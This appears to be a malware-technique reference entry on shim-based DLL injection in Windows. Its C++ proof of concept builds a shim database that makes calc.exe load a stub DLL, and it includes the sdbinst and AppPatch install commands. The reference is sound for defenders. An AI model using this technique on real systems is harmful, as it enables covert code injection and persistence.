Injection using Shims
Microsoft provides Shims to developers mainly for backward compatibility. Shims allow developers to apply fixes to their programs without the need of rewriting code. By leveraging shims, developers can tell the operating system how to handle their application. Shims are essentially a way of hooking into APIs and targeting specific executables. Malware can take advantage of shims to target an executable for both persistence and injection. Windows runs the Shim Engine when it loads a binary to check for shimming databases in order to apply the appropriate fixes.
Code Snippets
/*
Source: https://gist.github.com/w4kfu/95a87764db7029e03f09d78f7273c4f4
-------- dllinjshim.cpp --------
> cl /Fe:dllinjshim.exe dllinjshim.cpp
> dllinjshim.exe
> sdbinst moo.sdb
/!\ On Windows 10 there is a new function `SdbIsKnownShimDll` called
in `SdbGetDllPath` which will check the DLL name against the following list:
- "AcGenral.dll"
- "AcLayers.dll"
- "AcRes.dll"
- "AcSpecfc.dll"
- "AcWinRT.dll"
- "acwow64.dll"
- "AcXtrnal.dll"
- "KeyboardFilterShim.dll"
- "MasterShim.dll"
- "depdetct"
- "uacdetct"
- "luadgmgt.dll"
- "luapriv.dll"
- "EMET.dll"
- "EMET64.dll"
- "LogExts.dll"
- "LogShim.dll"
------------------------------------
*/
#include <windows.h>
#include <stdio.h>
#define INJECTED_DLL_NAME L"moo.dll"
#define EXECUTABLE_NAME L"calc.exe"
#define OS_PLATFORM 4 /* 0x1 : 32-bit ; 0x04 : 64-bit */
#define TAGID_NULL 0
#define TAG_TYPE_LIST 0x7000
#define TAG_DATABASE (0x1 | TAG_TYPE_LIST)
#define TAG_LIBRARY (0x2 | TAG_TYPE_LIST)
#define TAG_INEXCLUDE (0x3 | TAG_TYPE_LIST)
#define TAG_SHIM (0x4 | TAG_TYPE_LIST)
#define TAG_EXE (0x7 | TAG_TYPE_LIST)
#define TAG_MATCHING_FILE (0x8 | TAG_TYPE_LIST)
#define TAG_SHIM_REF (0x9 | TAG_TYPE_LIST)
#define TAG_TYPE_DWORD 0x4000
#define TAG_OS_PLATFORM (0x23| TAG_TYPE_DWORD)
#define TAG_TYPE_STRINGREF 0x6000
#define TAG_NAME (0x1 | TAG_TYPE_STRINGREF)
#define TAG_MODULE (0x3 | TAG_TYPE_STRINGREF)
#define TAG_APP_NAME (0x6 | TAG_TYPE_STRINGREF)
#define TAG_DLLFILE (0xA | TAG_TYPE_STRINGREF)
#define TAG_TYPE_BINARY 0x9000
#define TAG_EXE_ID (0x4 | TAG_TYPE_BINARY)
#define TAG_DATABASE_ID (0x7 | TAG_TYPE_BINARY)
#define TAG_TYPE_NULL 0x1000
#define TAG_INCLUDE (0x1 | TAG_TYPE_NULL)
typedef enum _PATH_TYPE {
DOS_PATH,
NT_PATH
} PATH_TYPE;
typedef HANDLE PDB;
typedef DWORD TAG;
typedef DWORD INDEXID;
typedef DWORD TAGID;
typedef struct tagATTRINFO {
TAG tAttrID;
DWORD dwFlags;
union {
ULONGLONG ullAttr;
DWORD dwAttr;
TCHAR *lpAttr;
};
} ATTRINFO, *PATTRINFO;
typedef PDB (WINAPI *SdbCreateDatabasePtr)(LPCWSTR, PATH_TYPE);
typedef VOID (WINAPI *SdbCloseDatabaseWritePtr)(PDB);
typedef TAGID (WINAPI *SdbBeginWriteListTagPtr)(PDB, TAG);
typedef BOOL (WINAPI *SdbEndWriteListTagPtr)(PDB, TAGID);
typedef BOOL (WINAPI *SdbWriteStringTagPtr)(PDB, TAG, LPCWSTR);
typedef BOOL (WINAPI *SdbWriteDWORDTagPtr)(PDB, TAG, DWORD);
typedef BOOL (WINAPI *SdbWriteBinaryTagPtr)(PDB, TAG, PBYTE, DWORD);
typedef BOOL (WINAPI *SdbWriteNULLTagPtr)(PDB, TAG);
typedef struct _APPHELP_API {
SdbCreateDatabasePtr SdbCreateDatabase;
SdbCloseDatabaseWritePtr SdbCloseDatabaseWrite;
SdbBeginWriteListTagPtr SdbBeginWriteListTag;
SdbEndWriteListTagPtr SdbEndWriteListTag;
SdbWriteStringTagPtr SdbWriteStringTag;
SdbWriteDWORDTagPtr SdbWriteDWORDTag;
SdbWriteBinaryTagPtr SdbWriteBinaryTag;
SdbWriteNULLTagPtr SdbWriteNULLTag;
} APPHELP_API, *PAPPHELP_API;
BOOL static LoadAppHelpFunctions(HMODULE hAppHelp, PAPPHELP_API pAppHelp) {
if (!(pAppHelp->SdbBeginWriteListTag = (SdbBeginWriteListTagPtr)GetProcAddress(hAppHelp, "SdbBeginWriteListTag"))) {
fprintf(stderr, "[-] GetProcAddress(..., \"SdbBeginWriteListTag\")\n");
return FALSE;
}
if (!(pAppHelp->SdbCloseDatabaseWrite = (SdbCloseDatabaseWritePtr)GetProcAddress(hAppHelp, "SdbCloseDatabaseWrite"))) {
fprintf(stderr, "[-] GetProcAddress(..., \"SdbCloseDatabaseWrite\")\n");
return FALSE;
}
if (!(pAppHelp->SdbCreateDatabase = (SdbCreateDatabasePtr)GetProcAddress(hAppHelp, "SdbCreateDatabase"))) {
fprintf(stderr, "[-] GetProcAddress(..., \"SdbCreateDatabase\")\n");
return FALSE;
}
if (!(pAppHelp->SdbEndWriteListTag = (SdbEndWriteListTagPtr)GetProcAddress(hAppHelp, "SdbEndWriteListTag"))) {
fprintf(stderr, "[-] GetProcAddress(..., \"SdbEndWriteListTag\")\n");
return FALSE;
}
if (!(pAppHelp->SdbWriteBinaryTag = (SdbWriteBinaryTagPtr)GetProcAddress(hAppHelp, "SdbWriteBinaryTag"))) {
fprintf(stderr, "[-] GetProcAddress(..., \"SdbWriteBinaryTag\")\n");
return FALSE;
}
if (!(pAppHelp->SdbWriteDWORDTag = (SdbWriteDWORDTagPtr)GetProcAddress(hAppHelp, "SdbWriteDWORDTag"))) {
fprintf(stderr, "[-] GetProcAddress(..., \"SdbWriteDWORDTag\")\n");
return FALSE;
}
if (!(pAppHelp->SdbWriteStringTag = (SdbWriteStringTagPtr)GetProcAddress(hAppHelp, "SdbWriteStringTag"))) {
fprintf(stderr, "[-] GetProcAddress(..., \"SdbWriteStringTag\")\n");
return FALSE;
}
if (!(pAppHelp->SdbWriteNULLTag = (SdbWriteNULLTagPtr)GetProcAddress(hAppHelp, "SdbWriteNULLTag"))) {
fprintf(stderr, "[-] GetProcAddress(..., \"SdbWriteNULLTag\")\n");
return FALSE;
}
return TRUE;
}
BOOL static DoStuff(PAPPHELP_API pAppHelp)
{
PDB db = NULL;
TAGID tIdDatabase;
TAGID tIdLibrary;
TAGID tIdShim;
TAGID tIdInexclude;
TAGID tIdExe;
TAGID tIdMatchingFile;
TAGID tIdShimRef;
db = pAppHelp->SdbCreateDatabase(L"moo.sdb", DOS_PATH);
if (db == NULL) {
fprintf(stderr, "[-] SdbCreateDatabase failed : %lu\n", GetLastError());
return FALSE;
}
tIdDatabase = pAppHelp->SdbBeginWriteListTag(db, TAG_DATABASE);
pAppHelp->SdbWriteDWORDTag(db, TAG_OS_PLATFORM, OS_PLATFORM);
pAppHelp->SdbWriteStringTag(db, TAG_NAME, L"moo_Database");
pAppHelp->SdbWriteBinaryTag(db, TAG_DATABASE_ID, "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42", 0x10);
tIdLibrary = pAppHelp->SdbBeginWriteListTag(db, TAG_LIBRARY);
tIdShim = pAppHelp->SdbBeginWriteListTag(db, TAG_SHIM);
pAppHelp->SdbWriteStringTag(db, TAG_NAME, L"moo_Shim");
pAppHelp->SdbWriteStringTag(db, TAG_DLLFILE, INJECTED_DLL_NAME);
tIdInexclude = pAppHelp->SdbBeginWriteListTag(db, TAG_INEXCLUDE);
pAppHelp->SdbWriteNULLTag(db, TAG_INCLUDE);
pAppHelp->SdbWriteStringTag(db, TAG_MODULE, L"*");
pAppHelp->SdbEndWriteListTag(db, tIdInexclude);
pAppHelp->SdbEndWriteListTag(db, tIdShim);
pAppHelp->SdbEndWriteListTag(db, tIdLibrary);
tIdExe = pAppHelp->SdbBeginWriteListTag(db, TAG_EXE);
pAppHelp->SdbWriteStringTag(db, TAG_NAME, EXECUTABLE_NAME);
pAppHelp->SdbWriteStringTag(db, TAG_APP_NAME, L"moo_Apps");
pAppHelp->SdbWriteBinaryTag(db, TAG_EXE_ID, "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41", 0x10);
tIdMatchingFile = pAppHelp->SdbBeginWriteListTag(db, TAG_MATCHING_FILE);
pAppHelp->SdbWriteStringTag(db, TAG_NAME, L"*");
pAppHelp->SdbEndWriteListTag(db, tIdMatchingFile);
tIdShimRef = pAppHelp->SdbBeginWriteListTag(db, TAG_SHIM_REF);
pAppHelp->SdbWriteStringTag(db, TAG_NAME, L"moo_Shim");
pAppHelp->SdbEndWriteListTag(db, tIdShimRef);
pAppHelp->SdbEndWriteListTag(db, tIdExe);
pAppHelp->SdbEndWriteListTag(db, tIdDatabase);
pAppHelp->SdbCloseDatabaseWrite(db);
return TRUE;
}
int main(int argc, char *argv[]) {
APPHELP_API api = {0};
HMODULE hAppHelp = NULL;
hAppHelp = LoadLibraryA("apphelp.dll");
if (hAppHelp == NULL) {
fprintf(stderr, "[-] LoadLibrary failed %lu\n", GetLastError());
return 1;
}
if (LoadAppHelpFunctions(hAppHelp, &api) == FALSE) {
printf("[-] Failed to load apphelp api %lu!\n", GetLastError());
return 1;
}
DoStuff(&api);
return 0;
}
moo.cpp
/*
-------- moo.cpp --------
> cl /LD /Fe:moo.dll moo.cpp
> copy moo.dll "C:\Windows\AppPatch\AppPatch64\moo.dll"
-------------------------
*/
#define EXPORT_FUNC extern "C" __declspec(dllexport)
EXPORT_FUNC int GetHookAPIs(PVOID a, PVOID b, PVOID c)
{
return 0x01;
}
EXPORT_FUNC int NotifyShims(PVOID a, PVOID b)
{
return 0x01;
}
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
{
UNREFERENCED_PARAMETER(hinstDLL);
UNREFERENCED_PARAMETER(lpReserved);
if (fdwReason == DLL_PROCESS_ATTACH) {
return TRUE;
}
return TRUE;
}